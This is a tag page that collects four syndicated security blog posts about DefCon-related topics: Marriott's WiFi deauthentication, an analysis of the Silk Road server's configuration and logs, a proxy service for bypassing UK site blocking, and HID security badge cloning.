Posts tagged ‘defcon’

Errata Security: Two Minutes of Hate: Marriot deauthing competing WiFi

This post was syndicated from: Errata Security and was written by: Robert Graham. Original post: at Errata Security

Do you stand for principle — even when it’s against your interests? Would you defend the free-speed rights of Nazis, for example? The answer is generally “no”, few people stand for principle. We see that in this morning’s news story about Marriott jamming (actually deauthing) portable WiFi hotspots in order to force customers to use their own high-priced WiFi.

The principle I want to discuss here is “arbitrary and discriminator enforcement”. It was the principle behind the Aaron Swartz and Andrew “weev” Auernheimer cases. The CFAA is a vague law where it is impossible to distinguish between allowed and forbidden behavior. Swartz and Weev were prosecuted under the CFAA not because what they did was “unauthorized access”, but because they pissed off the powerful. Prosecutors then interpreted the laws to suite their purposes.

The same thing is true in the Marriott case. Deauthing Wifi is common practice on large campuses everywhere, at company headquarters, hospitals, and college campuses. They do this for security reasons, to prevent rogue access-points from opening up holes behind the firewall. It’s also used at the DefCon conference, to prevent hostile access-points from tricking people by using “DefCon” in their name.

Section 333 of the Communications Act is vague on whether deauths are inherently illegal. That’s because they aren’t causing “interference” as the word is used in physics and radio communications. Indeed, if the access-point and the client simply ignored the deauth (which they can be configured to do), then they would have no effect on the radio communications. (I configure my systems this way on pentests, btw, it’s awesome).

Marriott quite rightly defends itself pointing out there is nothing that there is nothing in the rules that distinguish between the deauths everyone else is doing (which aren’t prosecuted by the FCC) and the deauths they were doing. Sure, they are shitty dirtbags for doing it, but there is nothing in the law that distinguishes between “shitty dirtbag deauth” and “cybersecurity deauth”.

In discussions on Twitter, I find that nobody cares about the principle of “discriminator enforcement”. Instead, all they cared about was that corporations are evil, and that Marriott was particularly evil in this instance. While nobody could explain what part of the law distinguished permissible deauth from impermissible ones, they frequently argued why deauths can be thought of as violating section 333 of the Communications Act. That’s missing the point: if their interpretation of the law is correct, then all deauths need to be prosecuted by the FCC, and all makers of WiFi security products (Cisco, Aruba, etc.) need to be prosecuted for marketing jammers within the United States.

The point isn’t whether spooing deauths is illegal. The point is “discriminatory enforcement”, and nobody seems to care — at least when it concerns those who they already hate.


The phrase “two minutes of hate” refers to George Orwell’s 1984. The picture above is from the movie. My outpouring of hate on my twitter feed feels like that.

Errata Security: Reading the Silk Road configuration

This post was syndicated from: Errata Security and was written by: Robert Graham. Original post: at Errata Security

Many of us believe it wasn’t the FBI who discovered the hidden Silk Road server, but the NSA (or other intelligence organization). We believe the FBI is using “parallel construction”, meaning creating a plausible story of how they found the server to satisfy the courts, but a story that isn’t true.

Today, Brian Krebs released data from the defense team that seems to confirm the “parallel construction” theory. I thought I’d write up a technical discussion of what was found.

The Tarbell declaration

A month ago, the FBI released a statement from the lead investigator, Christopher Tarbell, describing how he discovered the hidden server (“the Tarbell declaration“). This document had four noticeable defects.

The first is that the details are vague. It is impossible for anybody with technical skill (such as myself) to figure out what he did.

The second problem is that some of the details are impossible, such as seeing the IP address in the “packet headers”.

Thirdly, his saved none of the forensics data. You’d have thought that had this been real, he would have at least captured packet logs or even screenshots of what he did. I’m a technical blogger. I document this sort of thing all the time. It’s not hard for me, it shouldn’t be hard for the FBI when it’s the cornerstone of the entire case.

Lastly, Tarbell doesn’t even deny it was parallel construction. A scenario of an NSA agent showing up at the FBI offices and opening a browser to the IP address fits within his description of events.

I am a foremost Internet expert on this sort of thing. I think Christopher Tarbell is lying.

The two servers involved

There were two serves involved.

The actual Tor “onion” server ran on a server in Germany at the IP address 65.75.246.20. This was the front-end server.

The Silk Road data was held on a back-end server in Iceland at the IP address 193.107.86.49. This is the server Tarbell claims to have found.

The data dumped today on Brian Krebs’ site is configuration and log files from the second server.

The Icelandic configuration

The Icelandic backend had two “sites”, one on HTTP (port 80) running the phpmyadmin pages, and a second on HTTPS (port 443) for communicating the Silk Road content to the German onion server.

The HTTP (port 80) configuration is shown below. Because this requires “basic authentication”, Tarbell could not have accessed the server on this port.

However, the thing to note about this configuration is that “basic” authentication was used over port 80. If the NSA were monitoring links to/from Iceland, they could easily have discovered the password and used it to log onto the server. This is basic cybersecurity, what the “Wall of Sheep” at DefCon is all about.

The following picture shows the configuration of the HTTPS site.

Notice firstly that the “listen 443″ specifies only a port number and not an IP address. Consequently, anybody on the Internet could connect to the server and obtain its SSL certificate, even if it cannot get anything but an error message from the web server. Brian Krebs quotes Nicholas Weaver as claiming “This suggests that the Web service specifically refuses all connections except from the local host and the front-end Web server”. This is wrong, the web server accept all TCP connections, though it may give a “403 forbidden” as the result.

BTW: one plausible way of having discovered the server is to scan the entire Internet for SSL certificates, then correlate information in those certificates with the information found going across the Tor onion connection.

Next is the location information that allows only localhost, the German server, and then denies everything else (“deny all”). As mentioned above, this doesn’t prevent the TCP connection, but does produce a “403 forbidden” error code.

However, there is a flaw: this configuration is overridden for PHP files in the next section down. I’ve tested this on my own server. While non-PHP files are not accessible on the server, anything with the .php file extension still runs for everyone.

Worse yet, the login screen uses “/index.php”. The rules above convert an access of “/” automatically to “/index.php”. If indeed the server has the file “/var/www/market/public/index.php”, then Tarbell’s explanation starts to make sense. He’s still missing important details, and of course, there is no log of him having accessed the server this way,, but this demonstrates that something like his description isn’t impossible. One way this could have been found is by scanning the entire Internet for SSL servers, then searching for the string “Silkroad” in the resulting webpage.

The log files

The FBI imaged the server, including all the log files. Typical log entries looked like the following:

62.75.246.20 – – [14/Jul/2013:06:55:33 +0000] “GET /orders/cart HTTP/1.0″ 200 49072 “http://silkroadvb5piz3r.onion/silkroad/item/0f81d52be7″ “Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0″

Since the defense could not find in the logfiles where Tarbell had access the system, the prosecutors helped them out by pointing to entries that looked like the following:

199.170.71.133 – – [11/Jun/2013:16:58:36 +0000] “GET / HTTP/1.1″ 200 2616 “-” “Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.110 Safari/537.36″

199.170.71.133 – – [11/Jun/2013:16:58:36 +0000] “GET
/phpmyadmin.css.phpserver=1&lang=en&collation_connection=utf8_general_ci&token=451ca1a827cda1c8e80d0c0876e29ecc&js_frame=right&nocache=3988383895 HTTP/1.1″ 200 41724 “http://193.107.86.49/” “Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.110 Safari/537.36″

However, these entries are wrong. First, they are for the phpmyadmin pages and not the Silk Road login pages, so they are clearly not the pages described in the Tarbell declaration. Second, they return “200 ok” as the error code instead of a “401 unauthorized” login error as one would expect from the configuration. This means either the FBI knew the password, or the configuration has changed in the meantime, or something else is wrong with the evidence provided by the prosecutors.

Conclusion

As an expert in such topics as sniffing passwords and masscaning the Internet, I know that tracking down the Silk Road site is well within the NSA’s capabilities. Looking at the configuration files, I can attest to the fact that the Dread Pirate Roberts sucked at op-sec.

As an expert, I know the Tarbell declaration is gibberish. As an expert reading the configuration and logs, I know that it doesn’t match the Tarbell declaration. That’s not to say that the Tarbell declaration has been disproven, it’s just that “parallel construction” is a better explanation for what’s going on than Tarbell actually having found the Silk Road server on his own.

TorrentFreak: The Art of Unblocking Websites Without Committing Crimes

This post was syndicated from: TorrentFreak and was written by: Andy. Original post: at TorrentFreak

networkThe blocking of sites such as The Pirate Bay, KickassTorrents and Torrentz in the UK led to users discovering new ways to circumvent ISP-imposed censorship. There are plenty of solutions, from TOR and VPNs, to services with a stated aim of unblocking ‘pirate’ sites deemed illegal by UK courts.

Last month, however, dozens of these went offline when the operator of Immunicity and other related proxy services was arrested by City of London Police’s Intellectual Property Crime Unit. He now faces several charges including breaches of the Serious Crime Act 2007, Possession of Articles for Use in Fraud, Making or Supplying Articles for use in Frauds and money laundering.

While it’s generally accepted that running a site like The Pirate Bay is likely to attract police attention, merely unblocking a domain was not thought to carry any such risk. After all, visitors to torrent sites are just that, it’s only later on that they make a decision to infringe or not.

In our earlier article we discussed some of the possible reasons why the police might view “pirate” proxies to be illegal. However, there are very good arguments that general purpose proxies, even ones that are expressly setup to bypass filtering (and are able to unblock sites such as Pirate Bay), remain on a decent legal footing.

One such site is being operated by Gareth, a developer and networking guru who grew so tired of creeping Internet censorship he began lobbying UK MPs on the topic, later moving on to assist with the creation of the Open Rights Group’s Blocked.org.uk.

After campaigning and documenting Internet censorship issues for some time, Gareth first heard of last month’s proxy arrest during a visit to the United States.

“I was at DefCon in Las Vegas when the news of the Immunicity arrest reached me and I realized that for all my volunteer work, my open source applications, operation of Tor relays, donations and letters to MPs to highlight/combat the issues with Internet censorship, it was not enough,” the developer told TorrentFreak.

“I felt that this issue has moved from a political / technical issue to one about personal liberty and Internet freedom. e.g. first they came for the ‘pirate proxies’, then the Tor operators, then the ISPs that don’t censor their customers. The slippery slope is becoming a scary precipice.”

Since his return to the UK, Gareth has been busy creating his own independent anti-censorship tool. He’s researched in detail what happened to Immunicity, taken legal advice, and is now offering what he hopes is an entirely legal solution to website filtering and subsequent over-blocking (1)(2).

“Unlike Immunicity et al I’m not specifically building a ‘Pirate Proxy’. Granted people might use this proxy to navigate to torrent websites but were I to sell a laptop on eBay that same person may use it for the same reasons so I see no difference,” he explains.

“In fact Section 44, subsection 2 of the Serious Crimes Act 2007 even states [that an individual] is not to be taken to have intended to encourage or assist the commission of an offense merely because such encouragement or assistance was a foreseeable consequence of his act.”

The result of Gareth’s labor is the anti-censorship service Routing Packets is Not a Crime (RPINAC). People who used Immunicity in the past should feel at home, since RPINAC also utilizes the ability of popular browsers to use Proxy Auto-Config (PAC) files.

In the space of a couple of minutes and with no specialist knowledge, users can easily create their own PAC files covering any blocked site they like. Once configured, their browser will silently unblock them.

Furthermore, each PAC file has its own dedicated URL on RPINAC’s servers which users can revisit in order to add additional URLs for unblocking. PAC ‘unblock’ files can also be shared among like-minded people.

“When someone creates a PAC file they are redirected to a /view/ endpoint e.g. https://routingpacketsisnotacrime.uk/view/b718ce9b276bc2f10af90fe1d5b33c0d. This URL is not ephemeral, you can email it, tweet it (there is a tweet button on the left hand side of the site) etc and it will provide the recipient with the exact same view.

“It’ll show which URLs are specified to be proxied, which have been detected as blocked (using the https://blocked.org.uk database) and if the author passed along the password (assuming the PAC was password protected) they can add or remove URLs too,” Gareth explains.

“Each view page also has a comments section, this could allow for a small collection of individuals to co-ordinate with a smaller subset of password possessing moderators to create a crowd sourced PAC file in an autonomous fashion. There is also a ‘Clone’ button allowing anybody to create their own copy of the PAC file with their own name, description and password if the PAC file they’ve received isn’t quite what they need.”

This user-generated element of the process is important. While dedicated ‘pirate’ proxy sites specifically unblock sites already deemed illegal by the UK courts (and can be deemed to be facilitating their ‘crimes’), RPINAC leaves the decision of which sites to unblock completely down to the user. And since no High Court injunction forbids any user from accessing a blocked domain, both service and user remain on the right side of the law.

In terms of use, RPINAC is unobtrusive, has no popups, promotions or advertising, and will not ask for payment or donations, a further important legal point.

“To avoid any accusations of fraud and to avoid any tax implications RPINAC will never ask for donations,” the dev explains. “The current platform is pre-paid for at least a year, the domain for 10. At a bare minimum PAC file serving and education for creating local proxies will continue indefinitely.”

Finally, Gareth notes that without free and open source software his anti-censorship platform wouldn’t have been possible. So, in return, he has plans to release the source code for the project under the GPL 3.0 license.

RoutingPacketsIsNotACrime can be found here and is compatible with Firefox, Chrome, Safari and IE. Additional information can be sourced here.

Source: TorrentFreak, for the latest info on copyright, file-sharing and anonymous VPN services.

Krebs on Security: How Secure is Your Security Badge?

This post was syndicated from: Krebs on Security and was written by: BrianKrebs. Original post: at Krebs on Security

Security conferences are a great place to learn about the latest hacking tricks, tools and exploits, but they also remind us of important stuff that was shown to be hackable in previous years yet never really got fixed. Perhaps the best example of this at last week’s annual DefCon security conference in Las Vegas came from hackers who built on research first released in 2010 to show just how trivial it still is to read, modify and clone most HID cards — the rectangular white plastic “smart” cards that organizations worldwide distribute to employees for security badges.

HID iClass proximity card.

HID iClass proximity card.

Nearly four years ago, researchers at the Chaos Communication Congress (CCC), a security conference in Berlin, released a paper (PDF) demonstrating a serious vulnerability in smart cards made by Austin, Texas-based HID Global, by far the largest manufacturer of these devices. The CCC researchers showed that the card reader device that HID sells to validate the data stored on its then-new line of iClass proximity cards includes the master encryption key needed to read data on those cards.

More importantly, the researchers proved that anyone with physical access to one of these readers could extract the encryption key and use it to read, clone, and modify data stored on any HID cards made to work with those readers.

At the time, HID responded by modifying future models of card readers so that the firmware stored inside them could not be so easily dumped or read (i.e., the company removed the external serial interface on new readers). But according to researchers, HID never changed the master encryption key for its readers, likely because doing so would require customers using the product to modify or replace all of their readers and cards — a costly proposition by any measure given HID’s huge market share.

Unfortunately, this means that anyone with a modicum of hardware hacking skills, an eBay account, and a budget of less than $500 can grab a copy of the master encryption key and create a portable system for reading and cloning HID cards. At least, that was the gist of the DefCon talk given last week by the co-founders of Lares Consulting, a company that gets hired to test clients’ physical and network security.

Lares’ Joshua Perrymon and Eric Smith demonstrated how an HID parking garage reader capable of reading cards up to three feet away was purchased off of eBay and modified to fit inside of a common backpack. Wearing this backpack, an attacker looking to gain access to a building protected by HID’s iClass cards could obtain that access simply by walking up to a employee of the targeted organization and asking for directions, a light of a cigarette, or some other pretext.

Card cloning gear fits in a briefcase. Image: Lares Consulting.

Card cloning gear fits in a briefcase. Image: Lares Consulting.

Perrymon and Smith noted that, thanks to software tools available online, it’s easy to take card data gathered by the mobile reader and encode it onto a new card (also broadly available on eBay for a few pennies apiece). Worse yet, the attacker is then also able to gain access to areas of the targeted facility that are off-limits to the legitimate owner of the card that was cloned, because the ones and zeros stored on the card that specify that access level also can be modified.

Smith said he and Perrymon wanted to revive the issue at DefCon to raise awareness about a widespread vulnerability in physical security.  HID did not respond to multiple requests for comment.

“Until recently, no one has really demonstrated properly what the risk is to a business here,” Smith said. “SCADA installations, hospitals, airports…a lot of them use HID cards because HID is the leader in this space, but they’re using compromised technology. Your card might not have data center or HR access but I can get into those places within your organization just by coming up to some employee standing outside the building and bumming a light off of him.”

Organizations that are vulnerable have several options. Probably the cheapest involves the use of some type of sleeve for the smart cards. The wireless communications technology that these cards use to transmit data — called radio-frequency identification or RFID – can be blocked when not in use by storing the key cards inside a special RFID-shielding sleeve or wallet. Of course, organizations can replace their readers with newer (perhaps non-HID?) technology, and/or add biometric components to card readers, but these options could get pricey in a hurry.

A copy of the slides from Perrymon and Smith’s DefCon talk is available here.